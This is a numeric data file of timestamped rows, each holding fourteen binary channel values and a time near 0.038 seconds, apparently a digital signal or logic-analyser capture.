1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8125840e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8125864e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125872e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8125892e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125916e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8125940e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8125964e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,3.8125968e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8125972e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8126016e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8126040e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,3.8126044e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126048e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126064e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126092e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126116e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126140e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126164e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126188e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126212e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126240e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126264e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126292e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126316e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126340e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126364e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126388e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126412e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126440e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126464e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126492e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126516e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126540e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126564e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126588e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126612e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126640e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8126644e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8126664e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8126692e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,3.8126696e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126700e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126740e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126764e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126816e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126840e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126864e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126892e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8126916e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126940e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8126944e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8126964e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8126988e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8126996e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127012e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127040e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8127044e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8127092e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8127116e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127124e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127140e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127164e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127188e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127212e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127240e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127264e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127292e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,3.8127316e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8127320e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.8127364e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8127388e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127396e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127412e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127440e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127464e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127492e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127516e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127540e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127564e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127588e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127612e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127640e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127664e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127692e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127716e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127740e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127764e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127788e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127812e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127840e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127864e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127892e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127916e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127940e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8127964e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8127992e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128012e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128040e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128064e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128092e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128116e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128140e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128164e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128192e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128212e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128240e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128264e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128292e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128316e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128340e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128364e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128392e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128412e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128440e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128464e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128492e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128516e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128540e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128564e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128592e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128612e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128640e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128664e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128692e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128716e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128740e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128764e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128788e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128812e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128840e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128864e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128892e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8128916e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8128940e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.8128944e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,3.8253460e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,3.8253652e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,3.8253672e-02 0,1,0,0,1,1,0,0,0,1,0,1,0,1,3.8253692e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,3.8253716e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,1,3.8254028e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,3.8254056e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,3.8254060e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,3.8254080e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,3.8254104e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,3.8254132e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,3.8254156e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,3.8254180e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,3.8254204e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,3.8254228e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,3.8254252e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,3.8254280e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8254292e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8254304e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8254332e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8254356e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8254380e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8254404e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8254428e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8254452e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8254480e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8254504e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8254508e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8254556e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8254580e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8254588e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8254604e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8254628e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8254652e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8254680e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8254704e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8254732e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8254780e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8254804e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8254812e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8254828e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8254852e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8254880e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8254904e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8254932e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8254956e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8254980e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255004e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8255028e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255052e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8255080e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255104e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8255108e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8255156e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8255180e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255188e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8255204e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255228e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8255252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255280e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8255304e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255332e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8255356e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255380e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8255384e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8255428e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8255456e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,3.8255460e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255464e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8255480e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255504e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8255532e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255556e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8255560e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8255604e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8255632e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255636e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8255660e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255684e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8255708e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255732e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8255756e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255780e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8255808e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255832e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8255860e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255884e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8255908e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255932e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8255956e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8255980e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256008e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256032e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256060e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256084e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256108e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256132e-02 0,1,0,0,1,0,0,0,0,1,0,0,0,0,3.8256136e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8256140e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8256184e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8256208e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,3.8256212e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256216e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256232e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8256260e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8256308e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8256332e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256340e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256356e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256380e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256408e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256432e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256460e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256492e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256516e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256540e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8256544e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8256588e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8256612e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256620e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256636e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256660e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256688e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256712e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256740e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256764e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256788e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256812e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256836e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256860e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256888e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256912e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256940e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8256964e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8256988e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257012e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8257036e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257060e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8257088e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257112e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8257140e-02 0,1,0,0,1,0,0,0,0,1,0,0,0,0,3.8257164e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8257168e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8257212e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8257236e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257244e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8257260e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257288e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8257312e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257340e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8257364e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257388e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8257412e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257440e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8257444e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8257464e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8257492e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8257516e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8257540e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257548e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8257588e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257616e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8257668e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257692e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8257716e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257740e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8257764e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257788e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8257812e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257840e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8257844e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8257892e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8257916e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257924e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8257940e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8257964e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8257988e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258012e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8258040e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258064e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8258092e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258116e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8258140e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258164e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8258188e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258212e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8258240e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258264e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8258292e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258316e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8258340e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258364e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8258388e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258412e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8258440e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258464e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8258492e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258516e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8258540e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258564e-02 0,1,0,0,1,0,0,0,0,1,0,0,0,0,3.8258568e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8258572e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8258588e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8258612e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8258640e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8258664e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258672e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8258716e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258740e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8258788e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258816e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8258840e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258864e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8258892e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258916e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8258920e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8258964e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8258988e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8258996e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259016e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259040e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259064e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259092e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259116e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259140e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259164e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259188e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8259196e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.8259240e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.8259268e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,3.8259272e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259276e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259292e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259316e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259340e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259364e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259388e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259412e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259440e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259464e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259492e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259516e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259540e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259564e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259588e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259612e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259640e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259664e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259692e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259716e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259740e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259764e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259788e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259812e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259840e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259864e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259892e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259916e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259940e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8259964e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8259988e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260012e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260040e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260064e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260092e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260116e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260140e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260164e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.8260188e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.8260212e-02 